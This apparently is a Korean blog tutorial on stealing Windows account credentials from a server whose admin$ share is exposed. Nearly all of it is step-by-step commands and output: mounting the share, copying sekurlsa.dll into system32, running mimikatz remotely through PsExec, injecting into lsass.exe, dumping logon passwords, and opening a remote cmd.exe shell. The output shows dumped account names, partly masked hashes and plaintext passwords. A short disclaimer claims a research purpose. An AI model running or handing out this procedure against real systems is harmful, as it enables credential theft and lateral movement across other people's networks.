Notice : 해당 자료가 저작권등에 의해서 문제가 있다면 바로 삭제하겠습니다.
연구목적으로 사용하지 않고 악의적인 목적으로 이용할 경우 발생할 수 있는 법적은 책임은 모두 본인에게 있습니다.
admin$ 공유를 이용하면 계정을 탈취할 수 있다.
특히 누구나 접근가능한 everyone으로 열린 admin$ 공유는 매우 위험하다.
이번시간에는 mimikatz를 이용해 admin$ 가 공유된 서버의 계정을 탈취해보겠다.
1. 연결정보 확인.
C:\>net use * /y /delete
다음 원격 연결이 있습니다.
\\192.168.0.100\admin$
계속하면 연결이 취소됩니다.
명령을 잘 실행했습니다.
C:\>net use
새 연결 정보가 저장됩니다.
목록에 항목이 없습니다.
2. admin$ 공유를 net use으로 마운트
C:\>net use \\192.168.0.100\admin$ "pwd" /u:"user" 명령을 잘 실행했습니다.
3. 연결 정보 확인.
C:\>net use 새 연결 정보가 저장됩니다. 상태 로컬 원격 네트워크 ------------------------------------------------------------------------------- OK \\192.168.0.100\admin$ Microsoft Windows Network 명령을 잘 실행했습니다.
4. mimikatz 를 연결시키기 위해 dll 파일을 copy 한다.
C:\>copy C:\mimikatz\x64\sekurlsa.dll \\192.168.0.100\admin$\system32 1개 파일이 복사되었습니다.
5. psexec.exe를 사용하여 해당장비에 mimikatz으로 remote 연결을 한다.
C:\>PsExec.exe /accepteula \\192.168.0.100 -c C:\mimikatz\x64\mimikatz.exe PsExec v2.1 - Execute processes remotely Copyright (C) 2001-2013 Mark Russinovich Sysinternals - www.sysinternals.com mimikatz 1.0 x64 (RC) /* Traitement du Kiwi (Jan 23 2013 00:14:12) */ // http://blog.gentilkiwi.com/mimikatz mimikatz #
위와 같이 mimikatz 쉘이 떨어지면 성공이다.
6. debug모드로 변겅
mimikatz # privilege::debug Demande d'ACTIVATION du privil챔ge : SeDebugPrivilege : OK
7. sekurlsa.dll 을 lsass.exe 프로세스에 injection 한다.
mimikatz # inject::process lsass.exe sekurlsa.dll
PROCESSENTRY32(lsass.exe).th32ProcessID = 288
Attente de connexion du client...
Serveur connect챕 횪 un client !
Message du processus :
Bienvenue dans un processus distant
Gentil Kiwi
SekurLSA : librairie de manipulation des donn챕es de s챕curit챕s dans LSASS
========================================
Les fonctions suivantes NE SONT PLUS support챕es via l'injection de la librairie
sekurlsa.dll :
@getLogonPasswords @getMSV(Functions) @getTsPkg(Functions)
@getWDigest(Functions) @getLiveSSP(Functions) @getKerberos(Functions)
Les m챗mes fonctionnalit챕s (et m챗me plus !) sont disponibles SANS INJECTION :
sekurlsa::logonPasswords sekurlsa::msv sekurlsa::tspkg
sekurlsa::wdigest sekurlsa::livessp sekurlsa::kerberos
Vous pouvez d챕charger la librairie avec : @
Puis utiliser un module local, par exemple : sekurlsa::logonPasswords full
========================================
mimikatz #
성공적으로 injection 되었다.
8. sekurlsa 모듈을 이용해서 logonPasswords를 절취한다.
mimikatz # sekurlsa::logonPasswords full
Authentification Id : 0;598048
Package d'authentification : Kerberos
Utilisateur principal : administrator
Domaine d'authentification : DOMAIN
msv1_0
* Utilisateur : administrator
* Domaine : DOMAIN
* Hash LM : a9xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx09
* Hash NTLM : d5xxxxxxxxxxxxxxxxxxxxxxxxxxxxd6
kerberos
* Utilisateur : administrator
* Domaine : DOMAINP.TEST.CO.KR
* Mot de passe : passwd1234
ssp
wdigest
* Utilisateur : administrator
* Domaine : DOMAIN
* Mot de passe : password1234
Authentification Id : 0;10649521
Package d'authentification : Kerberos
Utilisateur principal : apollo89
Domaine d'authentification : DOMAIN
msv1_0
* Utilisateur : apollo89
* Domaine : DOMAIN
* Hash LM : d1xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx1b
* Hash NTLM : 38xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxb2
kerberos
* Utilisateur : apollo89
* Domaine : DOMAINP.TEST.CO.KR
* Mot de passe :
ssp
wdigest
* Utilisateur : apollo89
* Domaine : DOMAIN
* Mot de passe : apollopwd
mimikatz #
대박!!
번외로 mimikatz가 아닌 직접 cmd.exe으로 접속하고 싶다면 아래와 같이 하면된다.
C:\mimikatz\x64>PsExec.exe /accepteula \\192.168.0.100 cmd.exe PsExec v2.1 - Execute processes remotely Copyright (C) 2001-2013 Mark Russinovich Sysinternals - www.sysinternals.com Microsoft Windows [Version 5.2.3790] (C) Copyright 1985-2003 Microsoft Corp. C:\WINDOWS\system32>ipconfig Windows IP Configuration Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . : IP Address. . . . . . . . . . . . : 192.168.0.100 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 192.168.0.1 C:\WINDOWS\system32>
참고 : http://blog.opensecurityresearch.com/2012/06/using-mimikatz-to-dump-passwords.html
2 Responses to mimikatz를 이용해 admin$ 가 공유된 서버의 계정탈취